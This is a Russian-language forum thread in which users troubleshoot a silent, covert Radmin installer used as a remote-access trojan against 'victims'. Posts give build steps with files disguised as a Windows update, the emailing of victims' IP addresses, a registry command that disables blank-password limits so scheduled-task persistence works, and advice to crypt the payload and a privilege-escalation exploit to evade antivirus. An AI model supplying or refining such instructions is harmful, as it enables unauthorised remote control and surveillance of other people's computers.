Создание и тихая установка сервера Radmin 3.4 v2

Тема в разделе "Статьи", создана пользователем Iindigo, 16 дек 2010.

1. kirill456
    kirill456 Новичок
    Симпатии:
    0
    а он работает на динамическом модеме ? вирус

20 апр 2011
  2. onthar
    onthar Продвинутый
    Симпатии:
    224
    kirill456, он не на модеме работает, и это не вирус.

20 апр 2011
  3. kirill456
    kirill456 Новичок
    Симпатии:
    0
    Пацаны чё такое ? отпровляю жертве вирус мне приходит ип приконектиться не могу отпишите а

22 апр 2011
  4. onthar
    onthar Продвинутый
    Симпатии:
    224
    Удаленная система или за натом, или за фаером, или за роутером.
    Ничего не сделать.

22 апр 2011
  5. Edvardgreg
    Edvardgreg Новичок
    Симпатии:
    0
    Всем привет. Прочел все, вариантов много, в целом понятно все, но все-таки, какой вариант рабочий на 100%? Обновите плз первый пост чеб наверняка все.

23 апр 2011
  6. nnfsnnfs
    nnfsnnfs Новичок
    Симпатии:
    0
    Спасибо за темку.... но всё же все перечетав и попеределав... я так и не смог добится результата чтоб он проверял наличе интернета....

23 апр 2011
  7. dmitri44
    dmitri44 Новичок
    Симпатии:
    0
    1.Все файлы скачивай с 1 страницы
    2. На странице 26 сообщение от IRAKLI (он редактирует inst.exe и ip.exe) - отредактируй как он сказал

в итоге: msupdate.msi и poc.exe останутся неизменными
    inst.exe и ip.exe - поменять как написано у IRAKLI

При перезагрузке комп проверяет на наличие инета и когда интернет подключится, тебе придёт IP адрес на mail

23 апр 2011
  8. bozi
    bozi Новичок
    Симпатии:
    0
    Парни а как можно Скрить сплойт Windows Task Scheduler Privilege Escalation чтоб антивирусный не видела ! ? ПМ !

24 апр 2011
  9. onthar
    onthar Продвинутый
    Симпатии:
    224
    Криптуй)

24 апр 2011
  10. Edvardgreg
    Edvardgreg Новичок
    Симпатии:
    0
    Все по сборке как часы работает, и отправка IP и установка, вот тока к rAdmin-у этому не могу подключится. Нет НАТа, не фаервола, ниче нет, а се равно не конектится. В Viewer-ре пароль ввожу, на секунду значек конекта появляется и се, дальше ниче. А сообщения с IP шлет как надо. Через telnet получается, а через Радмин нет. Может сервер в сборке этой не рабочий????

25 апр 2011
  11. radikkk
    radikkk Новичок
    Симпатии:
    0
    Добавлю одну маленькую деталь. На многих XP-ках встреченных мне(не знаю как дела в vist'e и 7) ip не приходили, оказалось что планировщик не создавал задания, т.к. нельзя было использовать пустые пароли, даже если на системной учетке не было пароля, поэтому советую в батник добавить следующее:
    reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v limitblankpassworduse /t REG_DWORD /d 0 /f
    PS: (чтоб потом вопросов не было) Эту строку нужно добавлять до строки "schtasks...."

Последнее редактирование: 25 апр 2011
    25 апр 2011
  12. VorX
    VorX Новичок
    Симпатии:
    0
    Благодарю. Iindigo, onthar
    Очень рад, что есть такие люди
    Респект и уважуха вам парни
    Всё работает в идеале

8 май 2011
  13. asl1
    asl1 Guest
    А как подключатся к юзеру можно если IP не знаешь или как то по другому можно?

9 май 2011
  14. onthar
    onthar Продвинутый
    Симпатии:
    224
    asl1,
    никак, ип нужен

9 май 2011
  15. wongsing
    wongsing Новичок
    Симпатии:
    0
    привет всем!!! хорошая сборка, спасибо автору и всем кто мучился над ней!!!
    в принципе всё работает, устанавливается, IP на мыло приходит... но есть одна проблема, не могу никак подсоединится ко некоторым системам XP. с чем это может быть связано??? (стоит только nod32)

9 май 2011
  16. Iindigo
    Iindigo Guest
    wongsing, могу предположить, что сначала требуется перезагрузка. Хотя обычно всё работает сразу.

9 май 2011
  17. wongsing
    wongsing Новичок
    Симпатии:
    0
    в этом и проблема что всё делал, и перезагрузку... проблема всё таки в nod-e, файервол блокирует... попытаюсь разобраться...

Добавлено через 23 минуты
    короче палится страшное дело... на XP 50/50... а на W7, и то меньше из 10 где то 2-3... кто поможет зделать её по проще??? чтобы не палится так...

Последнее редактирование: 9 май 2011
    9 май 2011
  18. Iindigo
    Iindigo Guest
    это тебе в раздел крипторов. Если хочешь чтобы всё было совсем надёжно, то заказать крипт в разделе услуг.

10 май 2011
  19. blackunder
    blackunder Новичок
    Симпатии:
    2
    Привет всем !!! подскажите плс в чем может быть моя проблема ? делаю вроде всё точно так как написано в теме ... для теста беру фаил запускаю его на дедик грузица без ерроров ...
    но никак не могу подключится через радмин =( из за чего ето ?

22 май 2011
  20. Iindigo
    Iindigo Guest
    Ошибка какая-то есть?
    В режиме телнета или передачи файлов соединяется?

22 май 2011
Загрузка...